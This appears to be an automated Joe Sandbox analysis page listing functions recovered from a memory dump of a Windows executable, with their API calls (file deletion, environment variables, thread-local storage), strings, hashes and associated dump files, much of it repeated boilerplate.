Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: strstr
String ID: Collections of all histograms$Collections of histograms for %s
API String ID: 1392478783-1894274736
Opcode ID: d4ef15bfceffe0fd1a20c2327236a7634e339d7040b536f2ff9c3fc4889a37fd
Instruction ID: e1b62663e7dbe72a54d1ecffb8c1817fe1bad9cd332b44557412d90a214eeac4
Opcode Fuzzy Hash: d4ef15bfceffe0fd1a20c2327236a7634e339d7040b536f2ff9c3fc4889a37fd
Instruction Fuzzy Hash: B661C372310A8481EA22DB13D5483EEA7A1F78DBD4F468922FF59177A5DF78C581C304

Function 00000001400153B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

APIs

Part of subcall function 0000000140028D50: FindNextFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,-00000014,00000000), ref: 0000000140028DD7

SetFileAttributesW.KERNEL32 ref: 0000000140015482
RemoveDirectoryW.KERNEL32 ref: 00000001400154C5
GetLastError.KERNEL32 ref: 00000001400154FF

Strings

DeleteFile.NonRecursive, xrefs: 00000001400153B0

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: File$AttributesDirectoryErrorFindLastNextRemove
String ID: DeleteFile.NonRecursive
API String ID: 3479677588-3982342438
Opcode ID: 0955f23372bcb3ee715c1139e6fed199bae06e9f81bd6c8a7aa73a67c6d45f17
Instruction ID: 8e05cb4e11bc7c9ecbf9c1533e17e407ad1b0d0eff05bf0e127632c7c54230aa
Opcode Fuzzy Hash: 0955f23372bcb3ee715c1139e6fed199bae06e9f81bd6c8a7aa73a67c6d45f17
Instruction Fuzzy Hash: AF41B135215A8086EA72FB63B8553EB6391B7887C9F440426BF4A4F6A5DE39C8498700

Function 000000014001CA50 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 000000014001CB68
GetLastError.KERNEL32 ref: 000000014001CB86
SetLastError.KERNEL32(?,?,00000000,?,'old' input,00000000,000000014001C2EC,?,?,?,?,?,00000000,?,00000001400159D6), ref: 000000014001CB9E
GetLastError.KERNEL32 ref: 000000014001CBC3

Strings

'old' input, xrefs: 000000014001CA52

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: ErrorLast$CreateFile
String ID: 'old' input
API String ID: 1722934493-428240730
Opcode ID: 4632640cffef65e4e59c075661d2372e9ac532a892dad89d2f7b18cef1f5ffd7
Instruction ID: fc9eda192dc37b5452189f787d79ac55882eb3e373ab1cd2da86b353db1e22c0
Opcode Fuzzy Hash: 4632640cffef65e4e59c075661d2372e9ac532a892dad89d2f7b18cef1f5ffd7
Instruction Fuzzy Hash: B64164F7B24B1842FB269696EC89B993680F3587D0F464628EF168B2E0DB7DC8458740

Function 0000000140009790 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

_Getcvt.LIBCPMT ref: 00000001400097C2
_Getcvt.LIBCPMT ref: 00000001400097DB
Concurrency::cancel_current_task.LIBCPMT ref: 00000001400098D7

Part of subcall function 0000000140052110: std::bad_alloc::bad_alloc.LIBCMT ref: 0000000140052119
Part of subcall function 0000000140052110: _CxxThrowException.LIBVCRUNTIME ref: 000000014005212A

Strings

false, xrefs: 0000000140009851
true, xrefs: 0000000140009880

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: Getcvt$Concurrency::cancel_current_taskExceptionThrowstd::bad_alloc::bad_alloc
String ID: false$true
API String ID: 547298764-2658103896
Opcode ID: 4bb06cdc4b85f6210256bdc27fa80b9b1e234232ff74ea475d848576703ee789
Instruction ID: e5155fe9b598ad9a041c429ae27218f7ee682a10681b9f32bfeca17209fb5204
Opcode Fuzzy Hash: 4bb06cdc4b85f6210256bdc27fa80b9b1e234232ff74ea475d848576703ee789
Instruction Fuzzy Hash: 3A41C572605B8445FB23DB27B5513EA67A09B9E7C0F588125EF8E077A2EE39C546C340

Function 000000014001C660 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59fileCOMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 000000014001C6B8
SetFilePointerEx.KERNEL32 ref: 000000014001C6D0
SetEndOfFile.KERNEL32 ref: 000000014001C6DD
SetFilePointerEx.KERNEL32 ref: 000000014001C6F5

Strings

File::SetLength, xrefs: 000000014001C68F

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: File$Pointer
String ID: File::SetLength
API String ID: 1339342385-4027955366
Opcode ID: 454a769092d0d0f1ff0da1fa246ebca7d3f02e9ed24531bedee704b313f77e55
Instruction ID: 2b7f90a69640e81e0c49a492ca05523a254712e8933cfa72d413e3c93178e443
Opcode Fuzzy Hash: 454a769092d0d0f1ff0da1fa246ebca7d3f02e9ed24531bedee704b313f77e55
Instruction Fuzzy Hash: 82117272314A4041FB229B67F891BEB6350AB8DBD4F484126BF4E4BAB4DE38C645C700

Function 000000014005A0A4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000000014005A0C0
GetProcAddress.KERNEL32 ref: 000000014005A0D6
FreeLibrary.KERNEL32 ref: 000000014005A0F3

Strings

CorExitProcess, xrefs: 000000014005A0CF
mscoree.dll, xrefs: 000000014005A0B7

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a885d1fee52093274711cbf7056659992e5b56b1ad87f2f8b27d42248b4638c1
Instruction ID: 6f02a0d2eb1af19cd1d4e72efb634c6170d4cdb7bfd1fba7323d4b8dad7f46dc
Opcode Fuzzy Hash: a885d1fee52093274711cbf7056659992e5b56b1ad87f2f8b27d42248b4638c1
Instruction Fuzzy Hash: 09F05872322A0091EF568B62E8843A82360BF8CBD0F04641ABA4B472B0DF3DC588C700

Function 0000000140016A20 Relevance: 7.8, APIs: 5, Instructions: 329fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140015790: std::_Lockit::_Lockit.LIBCPMT ref: 00000001400157B8
Part of subcall function 0000000140015790: std::_Lockit::_Lockit.LIBCPMT ref: 00000001400157D7
Part of subcall function 0000000140015790: std::_Lockit::~_Lockit.LIBCPMT ref: 0000000140015803
Part of subcall function 0000000140015790: _Getctype.LIBCPMT ref: 00000001400158AC
Part of subcall function 0000000140015790: std::_Facet_Register.LIBCPMT ref: 00000001400158D4
Part of subcall function 0000000140015790: std::_Lockit::~_Lockit.LIBCPMT ref: 00000001400158EE

OutputDebugStringA.KERNEL32 ref: 0000000140016BA4
WriteFile.KERNEL32 ref: 0000000140016C45
SetLastError.KERNEL32 ref: 0000000140016E87
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0000000140016F17
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000140016F4A

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$DebugErrorFacet_FileGetctypeIos_base_dtorLastOutputRegisterStringWrite_invalid_parameter_noinfo_noreturnstd::ios_base::_
String ID:
API String ID: 746737293-0
Opcode ID: 63e470a32cc6fb73bb728281c00f9fb28c44ede11e29da1b777e022ab7b702ac
Instruction ID: 6cac4138c66703771b136dd0d5d6fe03e7f582a230f7017a7fbf2ea11d60488d
Opcode Fuzzy Hash: 63e470a32cc6fb73bb728281c00f9fb28c44ede11e29da1b777e022ab7b702ac
Instruction Fuzzy Hash: DDE12D32700A8586EB26DF62E8907ED2365F749BD8F444126EF5E0B7B5DF7AC9858300

Function 000000014002CC20 Relevance: 7.8, APIs: 5, Instructions: 264COMMON

Download Yara Rule

APIs

Part of subcall function 000000014002CFC0: GetEnvironmentVariableW.KERNEL32 ref: 000000014002D013
Part of subcall function 000000014002CFC0: GetEnvironmentVariableW.KERNEL32 ref: 000000014002D0B6

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000014002CDAC
SetEnvironmentVariableW.KERNEL32 ref: 000000014002CE50
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000014002CF05
SetEnvironmentVariableW.KERNEL32 ref: 000000014002CF51
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000014002CFB8

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3540648995-0
Opcode ID: ff7bb57e060022e5e5a0c892ab9206d46e6a54d8c5f4b8276a1c76e3a7cc3a5d
Instruction ID: 2d53d143381ae0d5c854b1b0f1386f7efe25ba576224cf75bd3c13086a4be5db
Opcode Fuzzy Hash: ff7bb57e060022e5e5a0c892ab9206d46e6a54d8c5f4b8276a1c76e3a7cc3a5d
Instruction Fuzzy Hash: 11A1D472710A8485EF129B2AD4457DD6362E78DBE8F404625FB5D1B7E9DF38C5868300

Function 000000014006FEF0 Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000000014006FF2C
_set_statfp.LIBCMT ref: 000000014006FF4A
_set_statfp.LIBCMT ref: 000000014006FF73
_set_statfp.LIBCMT ref: 000000014007012C

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 98a8134a28349afa237b6c80da18dbb5227939d1d769cea2b4574cca40ccec39
Instruction ID: 1f524431c87b71f710988bc4cecf917a8501b30ba0e3ac93166778df99ea29fa
Opcode Fuzzy Hash: 98a8134a28349afa237b6c80da18dbb5227939d1d769cea2b4574cca40ccec39
Instruction Fuzzy Hash: AC51E237600D88C6F6679F7AE8503EAA261BB4D3E4F148715BB5A275F0DB3C84829B40

Function 0000000140047410 Relevance: 7.6, APIs: 5, Instructions: 120COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000000140047444
TlsSetValue.KERNEL32 ref: 00000001400474AE
ReleaseSRWLockExclusive.KERNEL32 ref: 0000000140047509
TlsSetValue.KERNEL32 ref: 0000000140047593
_Init_thread_header.LIBCMT ref: 00000001400475BE

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: Value$ExclusiveInit_thread_headerLockRelease
String ID:
API String ID: 1047916916-0
Opcode ID: 0dcf7bbad0215d799890494014ce4e1331382b1a90acd5b0650ab20436e00339
Instruction ID: dd540e53bd0673195aafed3b21ee0dbef16a982146e793b6ce3e2514bc287a43
Opcode Fuzzy Hash: 0dcf7bbad0215d799890494014ce4e1331382b1a90acd5b0650ab20436e00339
Instruction Fuzzy Hash: A741AC3130154086FA56EB23E4547EA2391BB8CBE4F858625FF0E4B7B9DF39C9858740

Function 0000000140015630 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0000000140015658
std::_Lockit::_Lockit.LIBCPMT ref: 0000000140015677
std::_Lockit::~_Lockit.LIBCPMT ref: 00000001400156A3
std::_Facet_Register.LIBCPMT ref: 0000000140015747
std::_Lockit::~_Lockit.LIBCPMT ref: 0000000140015761

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 30df3e1f88b23f7984c84645e95dde0061fb91fdc9945c86aaa26fe3d3b56f24
Instruction ID: 504008065d30a9d20d849ded619df8b301e5697e60729d505f812e0b73cc1fe2
Opcode Fuzzy Hash: 30df3e1f88b23f7984c84645e95dde0061fb91fdc9945c86aaa26fe3d3b56f24
Instruction Fuzzy Hash: 25316935702A4080FA66EB13E9413E963A1FB8CBD4F448126EB4D0BBB9DF39C445C740

Function 0000000140028740 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0000000140028768
std::_Lockit::_Lockit.LIBCPMT ref: 0000000140028787
std::_Lockit::~_Lockit.LIBCPMT ref: 00000001400287B3
std::_Facet_Register.LIBCPMT ref: 0000000140028857
std::_Lockit::~_Lockit.LIBCPMT ref: 0000000140028871

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: f5fe1774e38a424335799d904cb8efba3b7100c312f0ef55eea4bf9093f48e55
Instruction ID: bd02910b898370087b81ea1b491b34500a84034c4ea85c5dab2d1b1a2702db38
Opcode Fuzzy Hash: f5fe1774e38a424335799d904cb8efba3b7100c312f0ef55eea4bf9093f48e55
Instruction Fuzzy Hash: 6F31163A602A4481FA26DB27E5453E963A2FB9CBD4F444029EF4D07BBADF38C855C740

Function 0000000140047790 Relevance: 7.6, APIs: 5, Instructions: 82COMMON

Download Yara Rule

APIs

TlsFree.KERNEL32 ref: 0000000140047800
TlsFree.KERNEL32 ref: 000000014004781A
TlsGetValue.KERNEL32(00000000,?,?,0000000140047912), ref: 0000000140047828
TlsSetValue.KERNEL32(?,0000000140047912), ref: 000000014004784D
TlsSetValue.KERNEL32(?,0000000140047912), ref: 0000000140047876

Part of subcall function 00000001400509F0: TlsAlloc.KERNEL32(00000000,?,?,0000000140047912), ref: 00000001400509F8

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: Value$Free$Alloc
String ID:
API String ID: 4173863045-0
Opcode ID: d00808be4325f918e4a9e21db9eea93f6a9363874f88bb9220fccb07dd8d6c52
Instruction ID: 5055e01d7247ec609cd2dd0d605b1a01421474e7002548d824d38af3d2dc3178
Opcode Fuzzy Hash: d00808be4325f918e4a9e21db9eea93f6a9363874f88bb9220fccb07dd8d6c52
Instruction Fuzzy Hash: 4B31C3317001404AF75ADBB2C915BED33629B8C7E8F514628BB1A1FBEADF398946C701

Function 000000014006E940 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000000014006E968
_set_statfp.LIBCMT ref: 000000014006E983
_set_statfp.LIBCMT ref: 000000014006E99F
_set_statfp.LIBCMT ref: 000000014006E9DB

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 8aea3e273e271712d6336b46edcc0d3ee9ccfd6fa119f9910292bcf53202a3fe
Instruction ID: fb833ccbe3debb0af6940b49392cf2a3d4f1b21903704752b5b41e46b3bab802
Opcode Fuzzy Hash: 8aea3e273e271712d6336b46edcc0d3ee9ccfd6fa119f9910292bcf53202a3fe
Instruction Fuzzy Hash: 7C118676A14B8141F6DA226BEC463ED11426F5D7F4F340F35BBAE072FACA3888458524

Function 0000000140069FD8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000014006A01B

Strings

gfff, xrefs: 000000014006A13D
-, xrefs: 000000014006A1FD
e+000, xrefs: 000000014006A0C0

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

